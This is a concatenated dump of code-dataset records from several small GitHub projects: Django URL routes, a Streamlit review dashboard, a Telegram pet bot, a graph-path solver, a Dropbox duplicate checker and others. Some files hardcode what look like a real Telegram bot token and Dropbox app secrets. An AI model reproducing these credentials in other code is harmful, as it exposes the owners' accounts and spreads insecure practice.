views.handle_file),\n\n url(r'^docls/$', views.docls),\n url(r'^docls/format/$', views.doclsFormat),\n url(r'^docls/([1-9][0-9]*)$', views.docls_by_id),\n url(r'^docls/publish/$', views.docls_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docms/$', views.docms),\n url(r'^docms/format/$', views.docmsFormat),\n url(r'^docms/([1-9][0-9]*)$', views.docms_by_id),\n url(r'^docms/publish/$', views.docms_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docns/$', views.docns),\n url(r'^docns/format/$', views.docnsFormat),\n url(r'^docns/([1-9][0-9]*)$', views.docns_by_id),\n url(r'^docns/publish/$', views.docns_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docos/$', views.docos),\n url(r'^docos/format/$', views.docosFormat),\n url(r'^docos/([1-9][0-9]*)$', views.docos_by_id),\n url(r'^docos/publish/$', views.docos_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docps/$', views.docps),\n url(r'^docps/format/$', views.docpsFormat),\n url(r'^docps/([1-9][0-9]*)$', views.docps_by_id),\n url(r'^docps/publish/$', views.docps_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^internationalDogs/$', views.internationalDogs),\n url(r'^internationalDogs/format/$', views.internationalDogsFormat),\n url(r'^internationalDogs/([1-9][0-9]*)$', views.internationalDogs_by_id),\n url(r'^internationalDogs/publish/$', views.internationalDogs_publish),\n\n url(r'^internationalAccrs/$', views.internationalAccrs),\n url(r'^internationalAccrs/format/$', views.internationalAccrsFormat),\n url(r'^internationalAccrs/([1-9][0-9]*)$', views.internationalAccrs_by_id),\n url(r'^internationalAccrs/publish/$', views.internationalAccrs_publish),\n\n url(r'^svedenOnes/$', views.svedenOnes),\n url(r'^svedenOnes/format/$', views.svedenOnesFormat),\n url(r'^svedenOnes/([1-9][0-9]*)$', views.svedenOnes_by_id),\n url(r'^svedenOnes/publish/$', views.svedenOnes_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^svedenTwos/$', views.svedenTwos),\n url(r'^svedenTwos/format/$', views.svedenTwosFormat),\n url(r'^svedenTwos/([1-9][0-9]*)$', views.svedenTwos_by_id),\n url(r'^svedenTwos/publish/$', views.svedenTwos_publish),\n\n url(r'^specCabs/$', views.specCabs),\n url(r'^specCabs/format/$', views.specCabsFormat),\n url(r'^specCabs/([1-9][0-9]*)$', views.specCabs_by_id),\n url(r'^specCabs/publish/$', views.specCabs_publish),\n\n url(r'^specPracs/$', views.specPracs),\n url(r'^specPracs/format/$', views.specPracsFormat),\n url(r'^specPracs/([1-9][0-9]*)$', views.specPracs_by_id),\n url(r'^specPracs/publish/$', views.specPracs_publish),\n\n url(r'^specLibs/$', views.specLibs),\n url(r'^specLibs/format/$', views.specLibsFormat),\n url(r'^specLibs/([1-9][0-9]*)$', views.specLibs_by_id),\n url(r'^specLibs/publish/$', views.specLibs_publish),\n\n url(r'^specSports/$', views.specSports),\n url(r'^specSports/format/$', views.specSportsFormat),\n url(r'^specSports/([1-9][0-9]*)$', views.specSports_by_id),\n url(r'^specSports/publish/$', views.specSports_publish),\n\n url(r'^specMeals/$', views.specMeals),\n url(r'^specMeals/format/$', views.specMealsFormat),\n url(r'^specMeals/([1-9][0-9]*)$', views.specMeals_by_id),\n url(r'^specMeals/publish/$', views.specMeals_publish),\n\n url(r'^specHealths/$', views.specHealths),\n url(r'^specHealths/format/$', views.specHealthsFormat),\n url(r'^specHealths/([1-9][0-9]*)$', views.specHealths_by_id),\n url(r'^specHealths/publish/$', views.specHealths_publish),\n\n url(r'^ovzs/$', views.ovzs),\n url(r'^ovzs/format/$', views.ovzsFormat),\n url(r'^ovzs/([1-9][0-9]*)$', views.ovzs_by_id),\n url(r'^ovzs/publish/$', views.ovzs_publish),\n\n url(r'^linkOvzs/$', views.linkOvzs),\n url(r'^linkOvzs/format/$', views.linkOvzsFormat),\n url(r'^linkOvzs/([1-9][0-9]*)$', views.linkOvzs_by_id),\n url(r'^linkOvzs/publish/$', views.linkOvzs_publish),\n\n url(r'^ovzTwos/$', views.ovzTwos),\n url(r'^ovzTwos/format/$', views.ovzTwosFormat),\n url(r'^ovzTwos/([1-9][0-9]*)$', views.ovzTwos_by_id),\n url(r'^ovzTwos/publish/$', views.ovzTwos_publish),\n\n url(r'^grants/$', views.grants),\n url(r'^grants/format/$', views.grantsFormat),\n url(r'^grants/([1-9][0-9]*)$', views.grants_by_id),\n url(r'^grants/publish/$', views.grants_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^grantInfos/$', views.grantInfos),\n url(r'^grantInfos/format/$', views.grantInfosFormat),\n url(r'^grantInfos/([1-9][0-9]*)$', views.grantInfos_by_id),\n url(r'^grantInfos/publish/$', views.grantInfos_publish),\n\n url(r'^grantInfoTwos/$', views.grantInfoTwos),\n url(r'^grantInfoTwos/format/$', views.grantInfoTwosFormat),\n url(r'^grantInfoTwos/([1-9][0-9]*)$', views.grantInfoTwos_by_id),\n url(r'^grantInfoTwos/publish/$', views.grantInfoTwos_publish),\n\n url(r'^acts/$', views.acts),\n url(r'^acts/format/$', views.actsFormat),\n url(r'^acts/([1-9][0-9]*)$', views.acts_by_id),\n url(r'^acts/publish/$', views.acts_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^jobs/$', views.jobs),\n url(r'^jobs/format/$', views.jobsFormat),\n url(r'^jobs/([1-9][0-9]*)$', views.jobs_by_id),\n url(r'^jobs/publish/$', views.jobs_publish),\n\n url(r'^gosAccreditations/$', views.gosAccreditations),\n url(r'^gosAccreditations/format/$', views.gosAccreditationsFormat),\n url(r'^gosAccreditations/([1-9][0-9]*)$', views.gosAccreditations_by_id),\n url(r'^gosAccreditations/publish/$', views.gosAccreditations_publish),\n\n url(r'^profs/$', views.profs),\n url(r'^profs/format/$', views.profsFormat),\n url(r'^profs/([1-9][0-9]*)$', views.profs_by_id),\n url(r'^profs/publish/$', views.profs_publish),\n\n url(r'^infs/$', views.infs),\n url(r'^infs/format/$', views.infsFormat),\n url(r'^infs/([1-9][0-9]*)$', views.infs_by_id),\n url(r'^infs/publish/$', views.infs_publish),\n\n url(r'^admiss/$', views.admiss),\n url(r'^admiss/format/$', views.admissFormat),\n url(r'^admiss/([1-9][0-9]*)$', views.admiss_by_id),\n url(r'^admiss/publish/$', views.admiss_publish),\n\n url(r'^perevs/$', views.perevs),\n url(r'^perevs/format/$', views.perevsFormat),\n url(r'^perevs/([1-9][0-9]*)$', views.perevs_by_id),\n url(r'^perevs/publish/$', views.perevs_publish),\n\n url(r'^obrazs/$', views.obrazs),\n url(r'^obrazs/format/$', views.obrazsFormat),\n url(r'^obrazs/([1-9][0-9]*)$', views.obrazs_by_id),\n url(r'^obrazs/publish/$', views.obrazs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^practics/$', views.practics),\n url(r'^practics/format/$', views.practicsFormat),\n url(r'^practics/([1-9][0-9]*)$', views.practics_by_id),\n url(r'^practics/publish/$', views.practics_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^sciencs/$', views.sciencs),\n url(r'^sciencs/format/$', views.sciencsFormat),\n url(r'^sciencs/([1-9][0-9]*)$', views.sciencs_by_id),\n url(r'^sciencs/publish/$', views.sciencs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^svedOrgs/$', views.svedOrgs),\n url(r'^svedOrgs/format/$', views.svedOrgsFormat),\n url(r'^svedOrgs/([1-9][0-9]*)$', views.svedOrgs_by_id),\n url(r'^svedOrgs/publish/$', views.svedOrgs_publish),\n\n url(r'^facilits/$', views.facilits),\n url(r'^facilits/format/$', views.facilitsFormat),\n url(r'^facilits/([1-9][0-9]*)$', views.facilits_by_id),\n url(r'^facilits/publish/$', views.facilits_publish),\n\n url(r'^objPracts/$', views.objPracts),\n url(r'^objPracts/format/$', views.objPractsFormat),\n url(r'^objPracts/([1-9][0-9]*)$', views.objPracts_by_id),\n url(r'^objPracts/publish/$', views.objPracts_publish),\n\n url(r'^librares/$', views.librares),\n url(r'^librares/format/$', views.libraresFormat),\n url(r'^librares/([1-9][0-9]*)$', views.librares_by_id),\n url(r'^librares/publish/$', views.librares_publish),\n\n url(r'^sports/$', views.sports),\n url(r'^sports/format/$', views.sportsFormat),\n url(r'^sports/([1-9][0-9]*)$', views.sports_by_id),\n url(r'^sports/publish/$', views.sports_publish),\n\n url(r'^meals/$', views.meals),\n url(r'^meals/format/$', views.mealsFormat),\n url(r'^meals/([1-9][0-9]*)$', views.meals_by_id),\n url(r'^meals/publish/$', views.meals_publish),\n\n url(r'^healts/$', views.healts),\n url(r'^healts/format/$', views.healtsFormat),\n url(r'^healts/([1-9][0-9]*)$', views.healts_by_id),\n url(r'^healts/publish/$', views.healts_publish),\n\n url(r'^ones/$', views.ones),\n url(r'^ones/format/$', views.onesFormat),\n url(r'^ones/([1-9][0-9]*)$', views.ones_by_id),\n url(r'^ones/publish/$', views.ones_publish),\n\n url(r'^twos/$', views.twos),\n url(r'^twos/format/$', views.twosFormat),\n url(r'^twos/([1-9][0-9]*)$', views.twos_by_id),\n url(r'^twos/publish/$', views.twos_publish),\n\n url(r'^threes/$', views.threes),\n url(r'^threes/format/$', views.threesFormat),\n url(r'^threes/([1-9][0-9]*)$', views.threes_by_id),\n url(r'^threes/publish/$', views.threes_publish),\n\n url(r'^fours/$', views.fours),\n url(r'^fours/format/$', views.foursFormat),\n url(r'^fours/([1-9][0-9]*)$', views.fours_by_id),\n url(r'^fours/publish/$', views.fours_publish),\n\n url(r'^fives/$', views.fives),\n url(r'^fives/format/$', views.fivesFormat),\n url(r'^fives/([1-9][0-9]*)$', views.fives_by_id),\n url(r'^fives/publish/$', views.fives_publish),\n\n url(r'^sixs/$', views.sixs),\n url(r'^sixs/format/$', views.sixsFormat),\n url(r'^sixs/([1-9][0-9]*)$', views.sixs_by_id),\n url(r'^sixs/publish/$', views.sixs_publish),\n\n url(r'^sevens/$', views.sevens),\n url(r'^sevens/format/$', views.sevensFormat),\n url(r'^sevens/([1-9][0-9]*)$', views.sevens_by_id),\n url(r'^sevens/publish/$', views.sevens_publish),\n\n url(r'^SaveFile$', views.SaveFile)\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"CombatLynx/Back","sub_path":"DjangoAPI/EmployeeApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":25442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22006748996","text":"import streamlit as st\r\nimport plotly.express as px\r\nfrom PIL import Image\r\nimport pandas as pd\r\n\r\nst.set_page_config(page_title=\"Mess Review\", page_icon=\"🍞\", layout=\"wide\")\r\nst.header(\"Welcome To ***Mess Review System*** 🍱\")\r\n\r\n#loading database\r\nexcel_file = \"mess_monthly_review.xlsx\"\r\nsheet_name = \"month12\"\r\n\r\ndf = pd.read_excel(excel_file,\r\n sheet_name=sheet_name,\r\n usecols='A:C',\r\n header = 0)\r\n\r\ndf_participants=pd.read_excel(excel_file,sheet_name = sheet_name,usecols='G:h',header = 0)\r\ndf_participants.dropna(inplace=True)\r\n\r\n# collection and selection\r\nfood_item = df[\"FOOD_ITEM\"].unique().tolist()\r\n\r\ndate = df['DATE'].unique().tolist()\r\n\r\ndate_selection = st.slider(\"Date:\",\r\n min_value=min(date),\r\n max_value=max(date),\r\n value = (min(date), max(date)))\r\n\r\nfood_item_selection=st.multiselect('FOOD ITEM:',\r\n food_item,\r\n default=food_item)\r\n\r\n\r\n#FILTERING DATAFRAME BASED ON THE SELECTION\r\n\r\nmask=(df[\"DATE\"].between(*date_selection)) & (df[\"FOOD_ITEM\"].isin(food_item_selection))\r\nnumber_of_result = df[mask].shape[0]\r\nst.markdown(f\"*Available Results: {number_of_result}*\")\r\n\r\ndf_grouped = df[mask].groupby(by = [\"REVIEW\"]).count()[[\"DATE\"]]\r\ndf_grouped = df_grouped.rename(columns={\"DATE\":\"Date\"})\r\ndf_grouped = df_grouped.reset_index()\r\n\r\n\r\n#PLOTTING BAR_CHART\r\nbar_chart=px.bar(df_grouped,\r\n x=\"REVIEW\",\r\n y=\"Date\",\r\n text=\"Date\",\r\n color_discrete_sequence=['#F63366']*len(df_grouped),\r\n template='plotly_white')\r\n\r\nst.plotly_chart(bar_chart)\r\n\r\n\r\n\r\nst.dataframe(df_participants)\r\n\r\npie_chart = px.pie(df_participants,\r\n title = \"Weekly Review\",\r\n values = \"Rev.\",\r\n names=\"Food\")\r\n\r\nst.plotly_chart(pie_chart)","repo_name":"gyash1512/KhollPoll","sub_path":"KhollPoll/monthly_rev.py","file_name":"monthly_rev.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72486087868","text":"n = int(input(\"Enter the value of n: \"))\nemployeeList = []\nprint(\"Now enter the ages: \")\nfor i in range(n):\n employeeList.append(int(input()))\n\ngroup1 = 0\ngroup2 = 0\ngroup3 = 0\n\nfor i in employeeList:\n if i >= 26 and i <= 35:\n group1 += 1\n elif i >= 36 and i <= 45:\n group2 += 1\n elif i >= 46 and i <= 55:\n group3 += 1\n\nprint(f\"Group1: {group1} Group2: {group2} Group3: {group3}\")\n","repo_name":"arnab7070/BeyondCoding","sub_path":"Python Programs/AOT IT Workshop/Final Lab Exam Revison/question25.py","file_name":"question25.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"70091424507","text":"import requests\nimport telebot\nimport os\n\nfrom telebot.types import Message\n\nbot = telebot.TeleBot(\"2131240436:AAEesff5vTebqaJkdwg3xJdDOjzW-fXTTUo\")\n\n# Handler para el comando de Inicio del bot\n@bot.message_handler(commands=['start'])\ndef start_command(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n keyboard.row(\n telebot.types.InlineKeyboardButton('Luna', callback_data='get-Luna'),\n telebot.types.InlineKeyboardButton('Rambo', callback_data='get-Rambo')\n )\n bot.send_message(\n message.chat.id,\n 'Bienvenido a PetBot!\\n' +\n 'A continuación podrás consultar la información de las mascotas registradas\\n' +\n 'Si Deseas saber otro comandos o más información usa /help o /about\\n' +\n 'Selecciona la mascota de la cual deseas saber su información: \\n',\n reply_markup=keyboard\n )\n\n# Handler del boton Luna del comando /Start\n@bot.callback_query_handler(lambda query: query.data == \"get-Luna\")\ndef iq_callback(query):\n id_mascota = \"9C E8 76 6E\"\n printInfo(query.message,id_mascota)\n\n# Handler del boton Rambo del comando /Start\n@bot.callback_query_handler(lambda query: query.data == \"get-Rambo\")\ndef iq_callback(query):\n id_mascota = \"1A E8 C2 82\"\n printInfo(query.message,id_mascota)\n\n# Funcion que realiza un Get Request a la base de datos\ndef printInfo(message,id_mascota):\n URL = '192.168.1.240'\n port = '3000'\n data = 'http://'+ URL + ':' + port + '/api/getInfo/' + id_mascota\n r = requests.get(data)\n pet = r.json()['data'][0]\n print(pet)\n bot.send_message(\n message.chat.id,\n 'Información de ' + pet['nombreMascota'] + '\\n' +\n 'ID de la mascota: ' + pet['idMascota'] + '\\n' +\n 'Raza de la mascota: ' + pet['raza'] + '\\n' +\n 'Intervalo de comidas: ' + str(pet['intervaloComida']) + ' hora(s).\\n'\n )\n\n# Handler del comando HELP\n@bot.message_handler(commands=['help'])\ndef help_command(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n keyboard.add(\n telebot.types.InlineKeyboardButton(\n 'Manda un correo!', url='mailto:a00829799@itesm.mx?subject=Ayuda%20-%20PetBot'\n )\n )\n bot.send_message(\n message.chat.id,\n 'Bienvenido! Puedes encontrar a continuación una lista de los comandos más importantes:\\n' +\n '/start - Realiza peticiones sobre el estado de tus mascotas\\n' +\n '/help - Desplegar las opciones del bot\\n' + \n '/about - Información sobre el bot\\n' + \n '/foto - Recibe una foto en tiempo real de lo que ve el dispensador.\\n' +\n 'Si necesitas ayuda, mandame un correo.',\n reply_markup=keyboard\n )\n\n# Handler del comando About\n@bot.message_handler(commands=['about'])\ndef info_about(message):\n bot.send_message(\n\tmessage.chat.id,\n\t'PETBOT es un dispositivo que se encarga de brindar la comida a las mascotas según las especificaciones de tiempo determinado.\\n' + \n\t'Esto permite a las personas llevar un registro de las veces que la mascota se acerca a comer al día.\\n' +\n\t'Este bot es un complemento al dispositivo para que el usuario pueda conseguir la informacion mas relevante sobre el estado de su mascota.'\n )\n\n# Handler del comando foto\n@bot.message_handler(commands=['foto'])\ndef foto_command(message):\n bot.send_message(\n message.chat.id,\n 'Espera un Momento por favor'\n )\n os.system(\"libcamera-jpeg -o test.jpg -n\")\n bot.send_message(\n\tmessage.chat.id,\n\t'Foto Tomada'\n )\n bot.send_photo(message.chat.id, photo=open('test.jpg', 'rb'))\n\nbot.polling(none_stop=True)\n","repo_name":"ianjduran/proyecto-iot-equipo-1","sub_path":"telegram bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"69976457467","text":"class Energy:\n\tdef __init__(self, kwargs):\n\t\t# initial energy of each node\n\t\tself.init = kwargs.get('init', 0.5)\n\n\t\t# energy for transferring of each bit \n\t\tself.trans = kwargs.get('trans', 50*0.000000001)\n\n\t\t# energy for receiving of each bit \n\t\tself.rec = kwargs.get('rec', 50*0.000000001)\n\n\t\t# energy for Data Aggregation \n\t\tself.data_aggr = kwargs.get('data_aggr', 5*0.000000001)\n\n\t\t# energy for free space model\n\t\tself.free_space = kwargs.get('free_space', 10*0.000000000001)\n\n\t\t# energy for multi path model\n\t\tself.multi_path = kwargs.get('multi_path', 0.0013*0.000000000001)\n\n\t\t# data aggregation energy\n\t\tself.aggr = kwargs.get('aggr', 5*0.000000001)\n\n\tdef __str__(self):\n\t\tresponse = \"\"\n\t\tresponse += \"init = %.1E\\n\" % self.init\n\t\tresponse += \"trans = %.1E\\n\" % self.trans\n\t\tresponse += \"rec = %.1E\\n\" % self.rec\n\t\tresponse += \"free_space = %.1E\\n\" % self.free_space\n\t\tresponse += \"multi_path = %.1E\\n\" % self.multi_path\n\t\tresponse += \"aggr = %.1E\\n\" % self.aggr\n\n\t\treturn response","repo_name":"aditya999123/SLP","sub_path":"Energy.py","file_name":"Energy.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6268713002","text":"'''\r\nEulerian Path Solution\r\n'''\r\n\r\n'''\r\nA Eulerian path in a deBruijn graph represents a path through the graph that crosses every edge\r\nexactly once. In order for a graph to have a Eulerian path, at most two nodes can be unbalanced.\r\nOf these two nodes, the node with more outward edges will be used as the starting position, and\r\nthe node with more inward edges will be the final node. This algorithm searches for a Eulerian\r\npath in a deBruijn graph by first determining which nodes are unbalanced by counting their outward\r\nedges and comparing this to all other nodes. Once a start position has been determined, a depth\r\nfirst search is performed until a path is found that exhausts all edges, and the final path through\r\nthe graph is returned with directed edges connecting nodes in sequence.\r\n'''\r\n\r\n\r\n\r\nfrom random import randint\r\nfrom copy import deepcopy\r\n\r\n\r\ndef create_adj_list(graph):\r\n adj_list = {} # key: node, value: nodes connected by outward edges\r\n circuit_max = 0\r\n for line in graph:\r\n node = line.strip('\\n') # form: 1: 2 3\r\n node = node.replace(':', '') # form: 1 2 3\r\n node = node.replace(' ', ',') # form: 1,2,3\r\n node = node.replace(',', ' ', 1) # form: 1 2,3\r\n node = node.split(' ') # form: 1 \\n 2,3\r\n adj_list.setdefault(node[0], [])\r\n for number in node[1].split(','):\r\n adj_list[node[0]].append(number) # adj_list['1] -> '1': ['2', '3']\r\n circuit_max += 1\r\n return adj_list, circuit_max\r\n\r\n\r\n\r\ndef find_start(red_adj_list):\r\n start = {}\r\n for key in red_adj_list:\r\n start.setdefault(key, 0)\r\n start[key] += len(red_adj_list[key])\r\n end = {}\r\n for key in red_adj_list:\r\n for value in red_adj_list[key]:\r\n end.setdefault(value, 0)\r\n end[value] += 1\r\n for key in end:\r\n try:\r\n if start[key] != end[key]:\r\n if start[key] > end[key]:\r\n start_node = key\r\n if start[key] < end[key]:\r\n end_node = key\r\n except KeyError:\r\n end_node = key\r\n for key in start:\r\n try:\r\n if end[key] != start[key]:\r\n if end[key] < start[key]:\r\n start_node = key\r\n if end[key] > start[key]:\r\n end_node = key\r\n except KeyError:\r\n start_node = key\r\n if end_node not in red_adj_list:\r\n red_adj_list[end_node] = []\r\n return red_adj_list, start_node\r\n\r\n\r\ndef eulerian_path(graph):\r\n # If inporting from file:\r\n # adj_list, circuit_max = create_adj_list(graph)\r\n # If using dictionary form:\r\n adj_list = graph\r\n circuit_max = sum(len(i) for i in list(adj_list.values()))\r\n red_adj_list = {}\r\n red_adj_list = deepcopy(adj_list)\r\n red_adj_list, start_node = find_start(red_adj_list)\r\n start = start_node\r\n curr_vert = start_node\r\n stack = []\r\n circuit = [] # eulerian path build as nodes run out of edges\r\n while len(circuit) != circuit_max: # continues increasing length of path until every edge has been crossed\r\n if len(red_adj_list[curr_vert]) > 0: # checks if outward edges are available\r\n stack.append(curr_vert)\r\n pick = randint(0, len(red_adj_list[curr_vert]) - 1) # picks random remaining outward edge\r\n temp = deepcopy(curr_vert) # temporary copy of current vertex for indexing\r\n curr_vert = red_adj_list[temp][pick] # random node to continue current path\r\n red_adj_list[temp].remove(curr_vert) # remove edge connecting current and previous nodes\r\n else:\r\n circuit.append(curr_vert) # adds node to final path once it has no outward edges left\r\n curr_vert = stack[len(stack) - 1]\r\n stack.pop() # removes from list of nodes with available edges\r\n path = ''\r\n path += start\r\n for vert in reversed(circuit):\r\n path += ('->' + vert)\r\n return path\r\n\r\n\r\n\r\n\r\n'''\r\nExample\r\n'''\r\n\r\n\r\nprint(eulerian_path({'TA': ['AA', 'AG'], 'AA': ['AT'], 'AT': ['TG'], 'TG': ['GT'], 'GT': ['TT'], 'TT': ['TA']}))\r\n\r\n\r\n# Output: TA->AA->AT->TG->GT->TT->TA->AG\r\n","repo_name":"Etsuna56/BioinformaticsAlgorithms","sub_path":"Bioinformatics2/eulerian_path.py","file_name":"eulerian_path.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30788366864","text":"#!/usr/bin/python3\nfrom dropbox.client import DropboxOAuth2Flow as DBAuth, DropboxClient as DBClient\nfrom bottle import route, template, post, run, request, redirect, response\nfrom tasks import check_task\n\ntpl = '''\n\n\n \n Dropbox MD5 Checker\n \n \n\tНовый поиск:
\n
\n %setdefault('path', '/')\n %setdefault('extensions', '.doc, .txt') \n
\n
\n \n
\n %if defined('status'):\n
\n Информация о задаче:
\n Task status: {{status}}
\n\t Path: {{path}}
\n Extensions: {{extensions}}
\n %end\n %if defined('coincidences'):\n
\n Совпадения:
\n %if coincidences:\n %for coincidence in coincidences:\n\t\t ► \n %for cpath in coincidence:\n {{cpath}} \n %end\n
\n %end\n %else:\n None\n %end\n %end\n \n\n'''\n\ntoken_name = b'dropbox-auth-csrf-token'\nsecret_key = \"secret key \"\nredirect_link = 'https://check.amokrov.org/check'\ndef get_flow(session):\n return DBAuth('bn4hy3qqp8ysquo', '4d53zmc6n8ldvo4', redirect_link, session, token_name)\n\ndef get_flow_start():\n session = dict()\n start = get_flow(session).start()\n response.set_cookie('token', str(session[token_name]), secret=secret_key, \n httponly=True, path='/', max_age=18000)\n return start\n\ndef get_flow_finish():\n return get_flow({token_name: request.get_cookie('token', secret=secret_key)}).finish(request.query)[0]\n\ndefault_path = '/'\ndefault_extensions = ['.doc', '.txt']\n\n@route('/')\ndef index():\n return template(tpl)\n\n@post('/')\ndef index_post():\n post_path = request.forms.path.strip()\n post_extensions = [extension.strip() for extension in request.forms.extensions.split(',')]\n if not len(post_path):\n post_path = default_path\n if not len(post_extensions) or not len(post_extensions[0]):\n post_extensions = default_extensions\n response.set_cookie('folder', post_path, secret=secret_key, httponly=True, path='/', max_age=18000)\n response.set_cookie('extensions', post_extensions, secret=secret_key, httponly=True, path='/', max_age=18000)\n redirect(get_flow_start())\n\n@route('/check')\ndef check():\n post_path = request.get_cookie('folder', secret=secret_key)\n post_extensions = request.get_cookie('extensions', secret=secret_key)\n if post_path is None:\n post_path = default_path\n if post_extensions is None:\n post_extensions = default_extensions\n response.set_cookie('guid', check_task.delay(\n DBClient(get_flow_finish()), \n post_path,\n post_extensions).id, \n secret=secret_key, httponly=True, path='/', max_age=18000)\n redirect('/result')\n\n@route('/result')\ndef result():\n post_path = request.get_cookie('folder', secret=secret_key)\n post_extensions = request.get_cookie('extensions', secret=secret_key)\n if post_path is None:\n post_path = default_path\n if post_extensions is None:\n post_extensions = default_extensions\n post_extensions = \", \".join(post_extensions)\n guid = request.get_cookie('guid', secret=secret_key)\n if guid is None:\n redirect('/')\n results = check_task.AsyncResult(guid)\n if results is None:\n return template(tpl, status='does not exist', path=post_path, extensions=post_extensions)\n if not results.ready():\n return template(tpl, status=results.status, path=post_path, extensions=post_extensions)\n return template(tpl, status=results.status, path=post_path, extensions=post_extensions, coincidences=results.get())\n\nrun(host='localhost', port=8081, reloader=True, debug=True, server='cherrypy')\n","repo_name":"sanyappc/duplicate-finder","sub_path":"filecheck.py","file_name":"filecheck.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31487414584","text":"import random\n\n# Split string method\nnames_string = input(\"Give me everybody's names, separated by a comma. \")\nnames = names_string.split(\", \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\n\n'''\nThe programm will randomly determine a person who will pay the bill :)\n'''\n\n# Get the total number of list names:\n\nnum_item = len(names)\n\n# Genarate a random number between 0 and last item:\n\nrandom_choice = random.randint(0, num_item - 1)\nthe_person_who_will_pay = names[random_choice]\nprint(the_person_who_will_pay + \" is going to buy the meal today\")\n\n# the_person_who_will_pay = random.choice(names) # ------ the advanced way using 'choice()'\n","repo_name":"Tsar36/100days_of_python","sub_path":"Who_pay_meal.py","file_name":"Who_pay_meal.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38254712030","text":"from django.core.exceptions import PermissionDenied\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom hknweb.utils import login_and_permission\n\nfrom hknweb.candidate.forms import ChallengeConfirmationForm\nfrom hknweb.candidate.models import OffChallenge\nfrom hknweb.candidate.utils import send_challenge_confirm_email\n\n\n@login_and_permission(\"candidate.change_offchallenge\")\ndef officer_confirm_view(request, pk):\n \"\"\"Officer views and confirms a challenge request after clicking email link.\n Only the officer who gave the challenge can review it.\"\"\"\n challenge = OffChallenge.objects.get(id=pk)\n if request.user.id != challenge.officer.id:\n raise PermissionDenied # not the officer that gave the challenge\n\n requester_name = challenge.requester.get_full_name()\n form = ChallengeConfirmationForm(request.POST or None, instance=challenge)\n context = {\n \"challenge\": challenge,\n \"requester_name\": requester_name,\n \"form\": form,\n }\n\n if form.is_valid():\n form.instance.reviewed = True\n form.save()\n # csec has already confirmed, and now officer confirms\n if challenge.officer_confirmed is True and challenge.csec_confirmed is True:\n send_challenge_confirm_email(request, form.instance, True)\n # csec has not already rejected, and now officer rejects\n elif (\n challenge.officer_confirmed is False\n and challenge.csec_confirmed is not False\n ):\n send_challenge_confirm_email(request, form.instance, False)\n # if neither is true, either need to wait for csec to review,\n # or csec has already rejected\n return redirect(\"/cand/reviewconfirm/{}\".format(pk))\n return render(request, \"candidate/challenge_confirm.html\", context=context)\n\n\n@login_and_permission(\"candidate.change_offchallenge\")\ndef confirm_challenge(request, id):\n if request.method != \"POST\":\n raise Http404()\n\n offchallenge = get_object_or_404(OffChallenge, id=id)\n offchallenge.officer_confirmed = True\n offchallenge.save()\n\n next_page = request.POST.get(\"next\", \"/\")\n return redirect(next_page)\n\n\n@login_and_permission(\"candidate.view_offchallenge\")\ndef officer_review_confirmation(request, pk):\n \"\"\"The page displayed after officer reviews challenge and clicks \"submit.\" \"\"\"\n challenge = OffChallenge.objects.get(id=pk)\n requester_name = challenge.requester.get_full_name()\n context = {\n \"challenge\": challenge,\n \"requester_name\": requester_name,\n }\n return render(request, \"candidate/review_confirm.html\", context=context)\n","repo_name":"Gabe-Mitnick/hknweb","sub_path":"hknweb/candidate/views/officer_challenge/confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"25297606221","text":"import math\n\nlog = False\n\n\ndef inter(i_q, i_b):\n\n print(i_b + 1, flush=True)\n a = input()\n i_q += 1\n if a == 'N':\n b = -1\n else:\n b = int(a)\n if (log):\n # print(log_file)\n print(i_b + 1, a, file=log_file)\n return i_q, b\n\n\ndef get_bit_index(n, n_b):\n if n_b & 1:\n i_b = n - 1 - ((n_b - 1) >> 1)\n else:\n i_b = n_b >> 1\n return i_b\n\n\ndef algo(n):\n res = [0] * 